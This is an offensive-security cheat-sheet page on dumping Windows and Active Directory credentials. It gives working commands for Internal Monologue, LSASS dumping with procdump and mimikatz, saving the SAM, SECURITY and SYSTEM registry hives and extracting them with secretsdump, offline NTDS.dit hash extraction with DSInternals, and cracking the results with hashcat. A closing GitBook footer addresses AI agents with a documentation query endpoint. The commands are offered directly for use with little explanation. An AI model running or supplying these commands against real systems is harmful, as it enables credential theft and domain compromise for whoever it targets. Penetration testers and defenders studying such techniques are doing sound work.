> For the complete documentation index, see [llms.txt](https://cheats.philkeeble.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://cheats.philkeeble.com/active-directory/alternate-cred-dumps.md). # Alternate Cred Dumps ## Internal Monologue Internal monologue is a way of dumping creds without touching LSASS. #### Using Internal Monologue ``` execute-assembly /root/ADShare/NET4.6.2/InternalMonologue.exe [help] ``` #### Cracking Returned Hashes ``` hashcat hashes.txt /usr/share/wordlists/rockyou.txt -m 5500 -force ``` ## Procdump + Mimikatz ``` # Dump with sysinternal windows signed binary procdump64.exe -accepteula -ma lsass.exe lsass.dmp # Move lsass.dmp offline and use mimikatz to open and dump passwords mimikatz # sekurlsa::minidump /root/lsass.dmp mimikatz # sekurlsa::logonpasswords # Viewing dump with invoke-mimikatz Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump C:\lsass.dmp" "sekurlsa::logonpasswords"' ``` ## Reg SAM / Security / System ``` reg save hklm\system system reg save hklm\security security reg save hklm\sam sam # Extract python secretsdump.py -security security -system system -sam sam LOCAL # Cracking MS-Cachev2 hashes recovered Make the this format: $DCC2$10240#username#hash Crack: hashcat -m2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --potfile-disable ``` ## Offline DCSync ``` # For this you need the NTDS.dit file and the SYSTEM registry hive # You will also need DSInternals PowerShell module. This can be moved across machines. # Import DSInternals import-module C:\Users\Administrator\Documents\DS\DSInternals\4.3\DSInternals.psd1 # Grab the bootkey from SYSTEM hive. This can be one offline or in a mounted DC VM. $key = Get-BootKey -SystemHivePath D:\Windows\System32\config\SYSTEM # Extract user information from NTDS.dit Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key # Extract Hashes from NTDS.dit in a dcsync format Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key | Format-Custom -View HashcatNT | Out-File vault-hashes.txt -Encoding ASCII # File can then be cracked, used as normal DCSync would. ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://cheats.philkeeble.com/active-directory/alternate-cred-dumps.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.